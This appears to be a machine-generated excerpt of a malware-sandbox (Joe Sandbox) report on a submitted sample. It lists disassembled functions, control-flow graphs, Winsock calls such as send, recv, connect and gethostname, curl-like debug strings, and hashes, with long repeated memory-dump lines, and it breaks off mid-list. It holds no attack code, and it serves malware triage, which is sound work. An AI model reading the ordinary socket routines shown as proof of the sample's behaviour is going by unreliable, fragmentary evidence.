                                                    control_flow_graph 1527 d576a0-d576be 1528 d576e6-d576f2 send 1527->1528 1529 d576c0-d576c7 1527->1529 1530 d576f4-d57709 call d572a0 1528->1530 1531 d5775e-d57762 1528->1531 1529->1528 1532 d576c9-d576d1 1529->1532 1530->1531 1534 d576d3-d576e4 1532->1534 1535 d5770b-d57759 call d572a0 call d5cb20 call 10d8c50 1532->1535 1534->1530 1535->1531
                                                    APIs
                                                    • send.WS2_32(multi.c,?,?,?,00D53D4E,00000000,?,?,00D607BF), ref: 00D576EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                    • API String ID: 2809346765-3388739168
                                                    • Opcode ID: 68bf0c4a883cb7657e9c67ef5a3e4bb6de77dbd7ac15fe0c88d8349df5f7cf1d
                                                    • Instruction ID: f7bc9ab91301727cdca9c72aafe5375d03b68049d4a2586dcba148740f95ddc3
                                                    • Opcode Fuzzy Hash: 68bf0c4a883cb7657e9c67ef5a3e4bb6de77dbd7ac15fe0c88d8349df5f7cf1d
                                                    • Instruction Fuzzy Hash: 48115CF9A193047BE9209B1ABD8AD2B3B5CDFC6B2EF540D18FC0423315D2619C1487B2
                                                    Function 00D57770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1646 d57770-d5778e 1647 d577b6-d577c2 recv 1646->1647 1648 d57790-d57797 1646->1648 1650 d577c4-d577d9 call d572a0 1647->1650 1651 d5782e-d57832 1647->1651 1648->1647 1649 d57799-d577a1 1648->1649 1652 d577a3-d577b4 1649->1652 1653 d577db-d57829 call d572a0 call d5cb20 call 10d8c50 1649->1653 1650->1651 1652->1650 1653->1651
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: recv
                                                    • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                    • API String ID: 1507349165-640788491
                                                    • Opcode ID: ba9fc7f91e9e4cff7139c8f83f850368e367b2b54d720d53a1c4ecdd1a890773
                                                    • Instruction ID: 2e16b6fcd01555fe38076c83ed5363f4b86577400e6bd8a3082467d15dea2b75
                                                    • Opcode Fuzzy Hash: ba9fc7f91e9e4cff7139c8f83f850368e367b2b54d720d53a1c4ecdd1a890773
                                                    • Instruction Fuzzy Hash: 3F112CF9A193047BE5209B15BC4AE2B7B5CDBC6B6DF18091CFC4863355E261DC1886F2
                                                    Function 00D575E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1665 d575e0-d575ed 1666 d57607-d57629 socket 1665->1666 1667 d575ef-d575f6 1665->1667 1669 d5763f-d57642 1666->1669 1670 d5762b-d5763c call d572a0 1666->1670 1667->1666 1668 d575f8-d575ff 1667->1668 1671 d57601-d57602 1668->1671 1672 d57643-d57699 call d572a0 call d5cb20 call 10d8c50 1668->1672 1670->1669 1671->1666
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                    • API String ID: 98920635-842387772
                                                    • Opcode ID: 6955866960438f6e982f5c206af15625480ff37d5aabadd19c0f4d02a06899b5
                                                    • Instruction ID: 4d53fb8735021a0a35fa43bb1883e6c080061af1e4797272da1645262c0194b5
                                                    • Opcode Fuzzy Hash: 6955866960438f6e982f5c206af15625480ff37d5aabadd19c0f4d02a06899b5
                                                    • Instruction Fuzzy Hash: AD114CB5A1531177DA20566D7C46F8B3B48DF8272EF140914FC54933A2D3218C68C3F2
                                                    Function 00D8A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1862 d8a150-d8a159 1863 d8a15f-d8a17b 1862->1863 1864 d8a250 1862->1864 1865 d8a249-d8a24f 1863->1865 1866 d8a181-d8a1ce getsockname 1863->1866 1865->1864 1867 d8a1d0-d8a1f5 call d6d090 1866->1867 1868 d8a1f7-d8a214 call d8ef30 1866->1868 1876 d8a240-d8a246 call d94f40 1867->1876 1868->1865 1872 d8a216-d8a23b call d6d090 1868->1872 1872->1876 1876->1865
                                                    APIs
                                                    • getsockname.WS2_32(?,?,00000080), ref: 00D8A1C7
                                                    Strings
                                                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00D8A23B
                                                    • getsockname() failed with errno %d: %s, xrefs: 00D8A1F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                    • API String ID: 3358416759-2605427207
                                                    • Opcode ID: c11f8030ca9f5d488c702e4768f6761586d40133aedcda6c0702508e8ca4e1bd
                                                    • Instruction ID: 0674b2618b4855adaffc7b054031ae26d9690d65552135b7a5f32729bafe5b6b
                                                    • Opcode Fuzzy Hash: c11f8030ca9f5d488c702e4768f6761586d40133aedcda6c0702508e8ca4e1bd
                                                    • Instruction Fuzzy Hash: 04210A31808680AAF735AB29EC46FE773BCEF91328F041615F98853151FA32598687F2
                                                    Function 00D6D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1882 d6d5e0-d6d5ee 1883 d6d652-d6d662 WSAStartup 1882->1883 1884 d6d5f0-d6d604 call d6d690 1882->1884 1885 d6d664-d6d66f 1883->1885 1886 d6d670-d6d676 1883->1886 1890 d6d606-d6d614 1884->1890 1891 d6d61b-d6d651 call d77620 1884->1891 1886->1884 1888 d6d67c-d6d68d 1886->1888 1890->1891 1896 d6d616 1890->1896 1896->1891
                                                    APIs
                                                    • WSAStartup.WS2_32(00000202), ref: 00D6D65A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: Startup
                                                    • String ID: if_nametoindex$iphlpapi.dll
                                                    • API String ID: 724789610-3097795196
                                                    • Opcode ID: 431bdf1cc78f379139c0f1ab32b53b57fc0c907ee05679307ccfe5088cc59b61
                                                    • Instruction ID: 61886cfeb7b02324b4b724fad61f2e8616a9d7e16de474c77ed1d925e6a59b55
                                                    • Opcode Fuzzy Hash: 431bdf1cc78f379139c0f1ab32b53b57fc0c907ee05679307ccfe5088cc59b61
                                                    • Instruction Fuzzy Hash: B7017BD0F4134453EB207B7DEC2B36535906B5130CF48146CE848923A2F629C448C373
                                                    Function 00E1AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1898 e1aa30-e1aa64 1900 e1ab04-e1ab09 1898->1900 1901 e1aa6a-e1aaa7 call e0e730 1898->1901 1902 e1ae80-e1ae89 1900->1902 1905 e1aaa9-e1aabd 1901->1905 1906 e1ab0e-e1ab13 1901->1906 1907 e1ab18-e1ab50 1905->1907 1908 e1aabf-e1aac7 1905->1908 1909 e1ae2e 1906->1909 1915 e1ab58-e1ab6d 1907->1915 1908->1909 1910 e1aacd-e1ab02 1908->1910 1911 e1ae30-e1ae4a call e0ea60 call e0ebf0 1909->1911 1910->1915 1923 e1ae75-e1ae7d 1911->1923 1924 e1ae4c-e1ae57 1911->1924 1917 e1ab96-e1abab socket 1915->1917 1918 e1ab6f-e1ab73 1915->1918 1917->1909 1921 e1abb1-e1abc5 1917->1921 1918->1917 1922 e1ab75-e1ab8f 1918->1922 1925 e1abd0-e1abed ioctlsocket 1921->1925 1926 e1abc7-e1abca 1921->1926 1922->1921 1935 e1ab91 1922->1935 1923->1902 1927 e1ae59-e1ae5e 1924->1927 1928 e1ae6e-e1ae6f 1924->1928 1930 e1ac10-e1ac14 1925->1930 1931 e1abef-e1ac0a 1925->1931 1926->1925 1929 e1ad2e-e1ad39 1926->1929 1927->1928 1936 e1ae60-e1ae6c 1927->1936 1928->1923 1933 e1ad52-e1ad56 1929->1933 1934 e1ad3b-e1ad4c 1929->1934 1937 e1ac37-e1ac41 1930->1937 1938 e1ac16-e1ac31 1930->1938 1931->1930 1940 e1ae29 1931->1940 1933->1940 1941 e1ad5c-e1ad6b 1933->1941 1934->1933 1934->1940 1935->1909 1936->1923 1943 e1ac43-e1ac46 1937->1943 1944 e1ac7a-e1ac7e 1937->1944 1938->1937 1938->1940 1940->1909 1948 e1ad70-e1ad78 1941->1948 1951 e1ad04-e1ad08 1943->1951 1952 e1ac4c-e1ac51 1943->1952 1946 e1ac80-e1ac9b 1944->1946 1947 e1ace7-e1acfe 1944->1947 1946->1947 1953 e1ac9d-e1acc1 1946->1953 1947->1951 1954 e1ada0-e1adb2 connect 1948->1954 1955 e1ad7a-e1ad7f 1948->1955 1951->1929 1956 e1ad0a-e1ad28 1951->1956 1952->1951 1957 e1ac57-e1ac78 1952->1957 1958 e1acc6-e1acd7 1953->1958 1960 e1adb3-e1adcf 1954->1960 1955->1954 1959 e1ad81-e1ad99 1955->1959 1956->1929 1956->1940 1957->1958 1958->1940 1966 e1acdd-e1ace5 1958->1966 1959->1960 1967 e1add5-e1add8 1960->1967 1968 e1ae8a-e1ae91 1960->1968 1966->1947 1966->1951 1969 e1ade1-e1adf1 1967->1969 1970 e1adda-e1addf 1967->1970 1968->1911 1971 e1adf3-e1ae07 1969->1971 1972 e1ae0d-e1ae12 1969->1972 1970->1948 1970->1969 1971->1972 1977 e1aea8-e1aead 1971->1977 1973 e1ae14-e1ae17 1972->1973 1974 e1ae1a-e1ae1c call e1af70 1972->1974 1973->1974 1978 e1ae21-e1ae23 1974->1978 1977->1911 1979 e1ae93-e1ae9d 1978->1979 1980 e1ae25-e1ae27 1978->1980 1981 e1aeaf-e1aeb1 call e0e760 1979->1981 1982 e1ae9f-e1aea6 call e0e7c0 1979->1982 1980->1911 1986 e1aeb6-e1aebe 1981->1986 1982->1986 1987 e1aec0-e1aedb call e0e180 1986->1987 1988 e1af1a-e1af1f 1986->1988 1987->1911 1991 e1aee1-e1aeec 1987->1991 1988->1911 1992 e1af02-e1af06 1991->1992 1993 e1aeee-e1aeff 1991->1993 1994 e1af08-e1af0b 1992->1994 1995 e1af0e-e1af15 1992->1995 1993->1992 1994->1995 1995->1902
                                                    APIs
                                                    • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00E1AB9B
                                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00E1ABE4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: ioctlsocketsocket
                                                    • String ID:
                                                    • API String ID: 416004797-0
                                                    • Opcode ID: df2fa88ae7744525e0b69905d69d035eab699c5a9daa2405203bbd8ba7ede2e6
                                                    • Instruction ID: fe65bb1cd4300a0704e6423966e7f96c376b34aa5b7bafd1bcd013893272a10b
                                                    • Opcode Fuzzy Hash: df2fa88ae7744525e0b69905d69d035eab699c5a9daa2405203bbd8ba7ede2e6
                                                    • Instruction Fuzzy Hash: 80E1D3706053019BEB20CF14C885BBB77E5EF85318F086A3DF998AB291D775D884CB92
                                                    Function 00D578B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID: FD %s:%d sclose(%d)
                                                    • API String ID: 2781271927-3116021458
                                                    • Opcode ID: eed5d8d2a6f3608460462593a7d20c505599508cd08128704a1f3aa613eedf6d
                                                    • Instruction ID: 4f4ba687d59571597d2720e85bdf50dd142a8b7047a92ca6f3bd71d3b0b2076e
                                                    • Opcode Fuzzy Hash: eed5d8d2a6f3608460462593a7d20c505599508cd08128704a1f3aa613eedf6d
                                                    • Instruction Fuzzy Hash: 64D05E3290A2206B89206599BC49C5F7BA8DECAF61B2A0958FD8077204D2209C1587F3
                                                    Function 00E1B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00E1B29E,?,00000000,?,?), ref: 00E1B0BA
                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00E03C41,00000000), ref: 00E1B0C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastconnect
                                                    • String ID:
                                                    • API String ID: 374722065-0
                                                    • Opcode ID: 4f27dca57f9ea44d53a7d468dfb8262c29f0593b24929292fa79a6149c8fff5d
                                                    • Instruction ID: ab352f01fe0d6b63febb7d83280fdfd441462864a502002e50858ba8753cc8b4
                                                    • Opcode Fuzzy Hash: 4f27dca57f9ea44d53a7d468dfb8262c29f0593b24929292fa79a6149c8fff5d
                                                    • Instruction Fuzzy Hash: 4101D836304200DBCA205A698884EEBB399FF8D368F040768F978A71E1D726ED908752
                                                    Function 00E04950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • gethostname.WS2_32(00000000,00000040), ref: 00E04AA5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
